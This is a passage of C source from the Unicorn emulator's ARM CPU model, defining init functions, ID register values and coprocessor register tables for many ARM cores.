= 0x01102131; cpu->isar.id_isar4 = 0x141; cpu->reset_auxcr = 7; } static void arm1176_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V6K); set_feature(&cpu->env, ARM_FEATURE_VAPA); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); set_feature(&cpu->env, ARM_FEATURE_EL3); cpu->midr = 0x410fb767; cpu->reset_fpsid = 0x410120b5; cpu->isar.mvfr0 = 0x11111111; cpu->isar.mvfr1 = 0x00000000; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00050078; cpu->id_pfr0 = 0x111; cpu->id_pfr1 = 0x11; cpu->isar.id_dfr0 = 0x33; cpu->id_afr0 = 0; cpu->isar.id_mmfr0 = 0x01130003; cpu->isar.id_mmfr1 = 0x10030302; cpu->isar.id_mmfr2 = 0x01222100; cpu->isar.id_isar0 = 0x0140011; cpu->isar.id_isar1 = 0x12002111; cpu->isar.id_isar2 = 0x11231121; cpu->isar.id_isar3 = 0x01102131; cpu->isar.id_isar4 = 0x01141; cpu->reset_auxcr = 7; } static void arm11mpcore_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V6K); set_feature(&cpu->env, ARM_FEATURE_VAPA); set_feature(&cpu->env, ARM_FEATURE_MPIDR); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); cpu->midr = 0x410fb022; cpu->reset_fpsid = 0x410120b4; cpu->isar.mvfr0 = 0x11111111; cpu->isar.mvfr1 = 0x00000000; cpu->ctr = 0x1d192992; /* 32K icache 32K dcache */ cpu->id_pfr0 = 0x111; cpu->id_pfr1 = 0x1; cpu->isar.id_dfr0 = 0; cpu->id_afr0 = 0x2; cpu->isar.id_mmfr0 = 0x01100103; cpu->isar.id_mmfr1 = 0x10020302; cpu->isar.id_mmfr2 = 0x01222000; cpu->isar.id_isar0 = 0x00100011; cpu->isar.id_isar1 = 0x12002111; cpu->isar.id_isar2 = 0x11221011; cpu->isar.id_isar3 = 0x01102131; cpu->isar.id_isar4 = 0x141; cpu->reset_auxcr = 1; } static void cortex_m0_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V6); set_feature(&cpu->env, ARM_FEATURE_M); cpu->midr = 0x410cc200; } static void cortex_m3_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_M); set_feature(&cpu->env, ARM_FEATURE_M_MAIN); cpu->midr = 0x410fc231; cpu->pmsav7_dregion = 8; cpu->id_pfr0 = 0x00000030; cpu->id_pfr1 = 0x00000200; cpu->isar.id_dfr0 = 0x00100000; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x00000030; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x00000000; cpu->isar.id_mmfr3 = 0x00000000; cpu->isar.id_isar0 = 0x01141110; cpu->isar.id_isar1 = 0x02111000; cpu->isar.id_isar2 = 0x21112231; cpu->isar.id_isar3 = 0x01111110; cpu->isar.id_isar4 = 0x01310102; cpu->isar.id_isar5 = 0x00000000; cpu->isar.id_isar6 = 0x00000000; } static void cortex_m4_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_M); set_feature(&cpu->env, ARM_FEATURE_M_MAIN); set_feature(&cpu->env, ARM_FEATURE_THUMB_DSP); cpu->midr = 0x410fc240; /* r0p0 */ cpu->pmsav7_dregion = 8; cpu->isar.mvfr0 = 0x10110021; cpu->isar.mvfr1 = 0x11000011; cpu->isar.mvfr2 = 0x00000000; cpu->id_pfr0 = 0x00000030; cpu->id_pfr1 = 0x00000200; cpu->isar.id_dfr0 = 0x00100000; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x00000030; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x00000000; cpu->isar.id_mmfr3 = 0x00000000; cpu->isar.id_isar0 = 0x01141110; cpu->isar.id_isar1 = 0x02111000; cpu->isar.id_isar2 = 0x21112231; cpu->isar.id_isar3 = 0x01111110; cpu->isar.id_isar4 = 0x01310102; cpu->isar.id_isar5 = 0x00000000; cpu->isar.id_isar6 = 0x00000000; } static void cortex_m7_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_M); set_feature(&cpu->env, ARM_FEATURE_M_MAIN); set_feature(&cpu->env, ARM_FEATURE_THUMB_DSP); cpu->midr = 0x411fc272; /* r1p2 */ cpu->pmsav7_dregion = 8; cpu->isar.mvfr0 = 0x10110221; cpu->isar.mvfr1 = 0x12000011; cpu->isar.mvfr2 = 0x00000040; cpu->id_pfr0 = 0x00000030; cpu->id_pfr1 = 0x00000200; cpu->isar.id_dfr0 = 0x00100000; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x00100030; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x01000000; cpu->isar.id_mmfr3 = 0x00000000; cpu->isar.id_isar0 = 0x01101110; cpu->isar.id_isar1 = 0x02112000; cpu->isar.id_isar2 = 0x20232231; cpu->isar.id_isar3 = 0x01111131; cpu->isar.id_isar4 = 0x01310132; cpu->isar.id_isar5 = 0x00000000; cpu->isar.id_isar6 = 0x00000000; } static void cortex_m33_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V8); set_feature(&cpu->env, ARM_FEATURE_M); set_feature(&cpu->env, ARM_FEATURE_M_MAIN); set_feature(&cpu->env, ARM_FEATURE_M_SECURITY); set_feature(&cpu->env, ARM_FEATURE_THUMB_DSP); cpu->midr = 0x410fd213; /* r0p3 */ cpu->pmsav7_dregion = 16; cpu->sau_sregion = 8; cpu->isar.mvfr0 = 0x10110021; cpu->isar.mvfr1 = 0x11000011; cpu->isar.mvfr2 = 0x00000040; cpu->id_pfr0 = 0x00000030; cpu->id_pfr1 = 0x00000210; cpu->isar.id_dfr0 = 0x00200000; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x00101F40; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x01000000; cpu->isar.id_mmfr3 = 0x00000000; cpu->isar.id_isar0 = 0x01101110; cpu->isar.id_isar1 = 0x02212000; cpu->isar.id_isar2 = 0x20232232; cpu->isar.id_isar3 = 0x01111131; cpu->isar.id_isar4 = 0x01310132; cpu->isar.id_isar5 = 0x00000000; cpu->isar.id_isar6 = 0x00000000; cpu->clidr = 0x00000000; cpu->ctr = 0x8000c000; } static void arm_v7m_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { ARMCPUClass *acc = ARM_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); acc->info = data; cc->do_interrupt = arm_v7m_cpu_do_interrupt; cc->cpu_exec_interrupt = arm_v7m_cpu_exec_interrupt; } static ARMCPRegInfo cortexr5_cp_reginfo[] = { /* Dummy the TCM region regs for the moment */ { .name = "ATCM", .cp = 15, .opc1 = 0, .crn = 9, .crm = 1, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_CONST }, { .name = "BTCM", .cp = 15, .opc1 = 0, .crn = 9, .crm = 1, .opc2 = 1, .access = PL1_RW, .type = ARM_CP_CONST }, { .name = "DCACHE_INVAL", .cp = 15, .opc1 = 0, .crn = 15, .crm = 5, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NOP }, REGINFO_SENTINEL }; static void cortex_r5_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_V7MP); set_feature(&cpu->env, ARM_FEATURE_PMSA); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x411fc153; /* r1p3 */ cpu->id_pfr0 = 0x0131; cpu->id_pfr1 = 0x001; cpu->isar.id_dfr0 = 0x010400; cpu->id_afr0 = 0x0; cpu->isar.id_mmfr0 = 0x0210030; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x01200000; cpu->isar.id_mmfr3 = 0x0211; cpu->isar.id_isar0 = 0x02101111; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232141; cpu->isar.id_isar3 = 0x01112131; cpu->isar.id_isar4 = 0x0010142; cpu->isar.id_isar5 = 0x0; cpu->isar.id_isar6 = 0x0; cpu->mp_is_up = true; cpu->pmsav7_dregion = 16; define_arm_cp_regs(cpu, cortexr5_cp_reginfo); } static void cortex_r5f_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); cortex_r5_initfn(uc, obj); cpu->isar.mvfr0 = 0x10110221; cpu->isar.mvfr1 = 0x00000011; } static const ARMCPRegInfo cortexa8_cp_reginfo[] = { { .name = "L2LOCKDOWN", .cp = 15, .crn = 9, .crm = 0, .opc1 = 1, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "L2AUXCR", .cp = 15, .crn = 9, .crm = 0, .opc1 = 1, .opc2 = 2, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; static void cortex_a8_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_EL3); cpu->midr = 0x410fc080; cpu->reset_fpsid = 0x410330c0; cpu->isar.mvfr0 = 0x11110222; cpu->isar.mvfr1 = 0x00011111; cpu->ctr = 0x82048004; cpu->reset_sctlr = 0x00c50078; cpu->id_pfr0 = 0x1031; cpu->id_pfr1 = 0x11; cpu->isar.id_dfr0 = 0x400; cpu->id_afr0 = 0; cpu->isar.id_mmfr0 = 0x31100003; cpu->isar.id_mmfr1 = 0x20000000; cpu->isar.id_mmfr2 = 0x01202000; cpu->isar.id_mmfr3 = 0x11; cpu->isar.id_isar0 = 0x00101111; cpu->isar.id_isar1 = 0x12112111; cpu->isar.id_isar2 = 0x21232031; cpu->isar.id_isar3 = 0x11112131; cpu->isar.id_isar4 = 0x00111142; cpu->isar.dbgdidr = 0x15141000; cpu->clidr = (1 << 27) | (2 << 24) | 3; cpu->ccsidr[0] = 0xe007e01a; /* 16k L1 dcache. */ cpu->ccsidr[1] = 0x2007e01a; /* 16k L1 icache. */ cpu->ccsidr[2] = 0xf0000000; /* No L2 icache. */ cpu->reset_auxcr = 2; define_arm_cp_regs(cpu, cortexa8_cp_reginfo); } static const ARMCPRegInfo cortexa9_cp_reginfo[] = { /* power_control should be set to maximum latency. Again, * default to 0 and set by private hook */ { .name = "A9_PWRCTL", .cp = 15, .crn = 15, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c15_power_control) }, { .name = "A9_DIAG", .cp = 15, .crn = 15, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c15_diagnostic) }, { .name = "A9_PWRDIAG", .cp = 15, .crn = 15, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c15_power_diagnostic) }, { .name = "NEONBUSY", .cp = 15, .crn = 15, .crm = 1, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST }, /* TLB lockdown control */ { .name = "TLB_LOCKR", .cp = 15, .crn = 15, .crm = 4, .opc1 = 5, .opc2 = 2, .access = PL1_W, .resetvalue = 0, .type = ARM_CP_NOP }, { .name = "TLB_LOCKW", .cp = 15, .crn = 15, .crm = 4, .opc1 = 5, .opc2 = 4, .access = PL1_W, .resetvalue = 0, .type = ARM_CP_NOP }, { .name = "TLB_VA", .cp = 15, .crn = 15, .crm = 5, .opc1 = 5, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST }, { .name = "TLB_PA", .cp = 15, .crn = 15, .crm = 6, .opc1 = 5, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST }, { .name = "TLB_ATTR", .cp = 15, .crn = 15, .crm = 7, .opc1 = 5, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST }, REGINFO_SENTINEL }; static void cortex_a9_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); set_feature(&cpu->env, ARM_FEATURE_EL3); /* Note that A9 supports the MP extensions even for * A9UP and single-core A9MP (which are both different * and valid configurations; we don't model A9UP). */ set_feature(&cpu->env, ARM_FEATURE_V7MP); set_feature(&cpu->env, ARM_FEATURE_CBAR); cpu->midr = 0x410fc090; cpu->reset_fpsid = 0x41033090; cpu->isar.mvfr0 = 0x11110222; cpu->isar.mvfr1 = 0x01111111; cpu->ctr = 0x80038003; cpu->reset_sctlr = 0x00c50078; cpu->id_pfr0 = 0x1031; cpu->id_pfr1 = 0x11; cpu->isar.id_dfr0 = 0x000; cpu->id_afr0 = 0; cpu->isar.id_mmfr0 = 0x00100103; cpu->isar.id_mmfr1 = 0x20000000; cpu->isar.id_mmfr2 = 0x01230000; cpu->isar.id_mmfr3 = 0x00002111; cpu->isar.id_isar0 = 0x00101111; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232041; cpu->isar.id_isar3 = 0x11112131; cpu->isar.id_isar4 = 0x00111142; cpu->isar.dbgdidr = 0x35141000; cpu->clidr = (1 << 27) | (1 << 24) | 3; cpu->ccsidr[0] = 0xe00fe019; /* 16k L1 dcache. */ cpu->ccsidr[1] = 0x200fe019; /* 16k L1 icache. */ define_arm_cp_regs(cpu, cortexa9_cp_reginfo); } uint64_t a15_l2ctlr_read(CPUARMState *env, const ARMCPRegInfo *ri) { #if 0 MachineState *ms = MACHINE(qdev_get_machine()); /* Linux wants the number of processors from here. * Might as well set the interrupt-controller bit too. */ return ((ms->smp.cpus - 1) << 24) | (1 << 23); #endif return (1 << 23); } static ARMCPRegInfo cortexa15_cp_reginfo[] = { { .name = "L2CTLR", .cp = 15, .crn = 9, .crm = 0, .opc1 = 1, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .readfn = a15_l2ctlr_read, .writefn = arm_cp_write_ignore }, { .name = "L2ECTLR", .cp = 15, .crn = 9, .crm = 0, .opc1 = 1, .opc2 = 3, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; static void cortex_a7_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7VE); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x410fc075; cpu->reset_fpsid = 0x41023075; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x11111111; cpu->ctr = 0x84448003; cpu->reset_sctlr = 0x00c50078; cpu->id_pfr0 = 0x00001131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x02010555; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10101105; cpu->isar.id_mmfr1 = 0x40000000; cpu->isar.id_mmfr2 = 0x01240000; cpu->isar.id_mmfr3 = 0x02102211; /* a7_mpcore_r0p5_trm, page 4-4 gives 0x01101110; but * table 4-41 gives 0x02101110, which includes the arm div insns. */ cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232041; cpu->isar.id_isar3 = 0x11112131; cpu->isar.id_isar4 = 0x10011142; cpu->isar.dbgdidr = 0x3515f005; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x701fe00a; /* 32K L1 dcache */ cpu->ccsidr[1] = 0x201fe00a; /* 32K L1 icache */ cpu->ccsidr[2] = 0x711fe07a; /* 4096K L2 unified cache */ define_arm_cp_regs(cpu, cortexa15_cp_reginfo); /* Same as A15 */ } static void cortex_a15_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7VE); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x412fc0f1; cpu->reset_fpsid = 0x410430f0; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x11111111; cpu->ctr = 0x8444c004; cpu->reset_sctlr = 0x00c50078; cpu->id_pfr0 = 0x00001131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x02010555; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10201105; cpu->isar.id_mmfr1 = 0x20000000; cpu->isar.id_mmfr2 = 0x01240000; cpu->isar.id_mmfr3 = 0x02102211; cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232041; cpu->isar.id_isar3 = 0x11112131; cpu->isar.id_isar4 = 0x10011142; cpu->isar.dbgdidr = 0x3515f021; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x701fe00a; /* 32K L1 dcache */ cpu->ccsidr[1] = 0x201fe00a; /* 32K L1 icache */ cpu->ccsidr[2] = 0x711fe07a; /* 4096K L2 unified cache */ define_arm_cp_regs(cpu, cortexa15_cp_reginfo); } static void ti925t_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V4T); set_feature(&cpu->env, ARM_FEATURE_OMAPCP); cpu->midr = ARM_CPUID_TI925T; cpu->ctr = 0x5109149; cpu->reset_sctlr = 0x00000070; } static void sa1100_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_STRONGARM); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); cpu->midr = 0x4401A11B; cpu->reset_sctlr = 0x00000070; } static void sa1110_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_STRONGARM); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); cpu->midr = 0x6901B119; cpu->reset_sctlr = 0x00000070; } static void pxa250_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052100; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa255_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052d00; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa260_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052903; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa261_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052d05; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa262_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052d06; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270a0_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054110; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270a1_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054111; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270b0_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054112; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270b1_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054113; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270c0_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054114; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270c5_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054117; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } #ifndef TARGET_AARCH64 /* -cpu max: if KVM is enabled, like -cpu host (best possible with this host); * otherwise, a CPU with as many features enabled as our emulation supports. * The version of '-cpu max' for qemu-system-aarch64 is defined in cpu64.c; * this only needs to handle 32 bits. */ static void arm_max_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); { cortex_a15_initfn(uc, obj); /* old-style VFP short-vector support */ FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSHVEC, 1, cpu->isar.mvfr0); // Unicorn: Enable this on ARM_MAX //#ifdef CONFIG_USER_ONLY /* We don't set these in system emulation mode for the moment, * since we don't correctly set (all of) the ID registers to * advertise them. */ set_feature(&cpu->env, ARM_FEATURE_V8); { uint32_t t; t = cpu->isar.id_isar5; FIELD_DP32(t, ID_ISAR5, AES, 2, t); FIELD_DP32(t, ID_ISAR5, SHA1, 1, t); FIELD_DP32(t, ID_ISAR5, SHA2, 1, t); FIELD_DP32(t, ID_ISAR5, CRC32, 1, t); FIELD_DP32(t, ID_ISAR5, RDM, 1, t); FIELD_DP32(t, ID_ISAR5, VCMA, 1, t); cpu->isar.id_isar5 = t; t = cpu->isar.id_isar6; FIELD_DP32(t, ID_ISAR6, JSCVT, 1, t); FIELD_DP32(t, ID_ISAR6, DP, 1, t); FIELD_DP32(t, ID_ISAR6, FHM, 1, t); FIELD_DP32(t, ID_ISAR6, SB, 1, t); FIELD_DP32(t, ID_ISAR6, SPECRES, 1, t); cpu->isar.id_isar6 = t; t = cpu->isar.mvfr1; FIELD_DP32(t, MVFR1, FPHP, 2, t); /* v8.0 FP support */ cpu->isar.mvfr1 = t; t = cpu->isar.mvfr2; FIELD_DP32(t, MVFR2, SIMDMISC, 3, t); /* SIMD MaxNum */ FIELD_DP32(t, MVFR2, FPMISC, 4, t); /* FP MaxNum */ cpu->isar.mvfr2 = t; t = cpu->isar.id_mmfr3; FIELD_DP32(t, ID_MMFR3, PAN, 2, t); /* ATS1E1 */ cpu->isar.id_mmfr3 = t; t = cpu->isar.id_mmfr4; FIELD_DP32(t, ID_MMFR4, HPDS, 1, t); /* AA32HPD */ FIELD_DP32(t, ID_MMFR4, AC2, 1, t); /* ACTLR2, HACTLR2 */ FIELD_DP32(t, ID_MMFR4, CNP, 1, t); /* TTCNP */ cpu->isar.id_mmfr4 = t; } //#endif } } #endif #endif /* !defined(TARGET_AARCH64) */ struct ARMCPUInfo { const char *name; void (*initfn)(struct uc_struct *uc, CPUState *obj); void (*class_init)(struct uc_struct *uc, CPUClass *oc, void *data); }; #if !defined(TARGET_AARCH64) static struct ARMCPUInfo arm_cpus[] = { { "arm926", arm926_initfn }, { "arm946", arm946_initfn }, { "arm1026", arm1026_initfn }, /* What QEMU calls "arm1136-r2" is actually the 1136 r0p2, i.e. an * older core than plain "arm1136". In particular this does not * have the v6K features. */ { "arm1136-r2", arm1136_r2_initfn }, { "arm1136", arm1136_initfn }, { "arm1176", arm1176_initfn }, { "arm11mpcore", arm11mpcore_initfn }, { "cortex-m0", cortex_m0_initfn, arm_v7m_class_init }, { "cortex-m3", cortex_m3_initfn, arm_v7m_class_init }, { "cortex-m4", cortex_m4_initfn, arm_v7m_class_init }, { "cortex-m7", cortex_m7_initfn, arm_v7m_class_init }, { "cortex-m33", cortex_m33_initfn, arm_v7m_class_init }, { "cortex-r5", cortex_r5_initfn }, { "cortex-r5f", cortex_r5f_initfn }, { "cortex-a7", cortex_a7_initfn }, { "cortex-a8", cortex_a8_initfn }, { "cortex-a9", cortex_a9_initfn }, { "cortex-a15", cortex_a15_initfn }, { "ti925t", ti925t_initfn }, { "sa1100", sa1100_initfn }, { "sa1110", sa1110_initfn }, { "pxa250", pxa250_initfn }, { "pxa255", pxa255_initfn }, { "pxa260", pxa260_initfn }, { "pxa261", pxa261_initfn }, { "pxa262", pxa262_initfn }, /* "pxa270" is an alias for "pxa270-a0" */ { "pxa270", pxa270a0_initfn }, { "pxa270-a0", pxa270a0_initfn }, { "pxa270-a1", pxa270a1_initfn }, { "pxa270-b0", pxa270b0_initfn }, { "pxa270-b1", pxa270b1_initfn }, { "pxa270-c0", pxa270c0_initfn }, { "pxa270-c5", pxa270c5_initfn }, { "max", arm_max_initfn }, }; #endif void arm_cpu_class_init(struct uc_struct *uc, CPUClass *oc) { ARMCPUClass *acc = ARM_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(acc); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ acc->parent_reset = cc->reset; /* overwrite the CPUClass->reset to arch reset: arm_cpu_reset(). */ cc->reset = arm_cpu_reset; cc->has_work = arm_cpu_has_work; cc->cpu_exec_interrupt = arm_cpu_exec_interrupt; cc->set_pc = arm_cpu_set_pc; cc->synchronize_from_tb = arm_cpu_synchronize_from_tb; cc->do_interrupt = arm_cpu_do_interrupt; cc->get_phys_page_attrs_debug = arm_cpu_get_phys_page_attrs_debug; cc->asidx_from_attrs = arm_asidx_from_attrs; cc->tcg_initialize = arm_translate_init; cc->tlb_fill_cpu = arm_cpu_tlb_fill; cc->debug_excp_handler = arm_debug_excp_handler; cc->do_unaligned_access = arm_cpu_do_unaligned_access; } static void arm_cpu_instance_init(CPUState *obj) { #if 0 ARMCPUClass *acc = ARM_CPU_GET_CLASS(obj); acc->info->initfn(obj); #endif arm_cpu_post_init(obj); } ARMCPU *cpu_arm_init(struct uc_struct *uc) { ARMCPU *cpu; CPUState *cs; CPUClass *cc; CPUARMState *env; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } #if !defined(TARGET_AARCH64) if (uc->mode & UC_MODE_MCLASS) { uc->cpu_model = UC_CPU_ARM_CORTEX_M33; } else if (uc->mode & UC_MODE_ARM926) { uc->cpu_model = UC_CPU_ARM_926; } else if (uc->mode & UC_MODE_ARM946) { uc->cpu_model = UC_CPU_ARM_946; } else if (uc->mode & 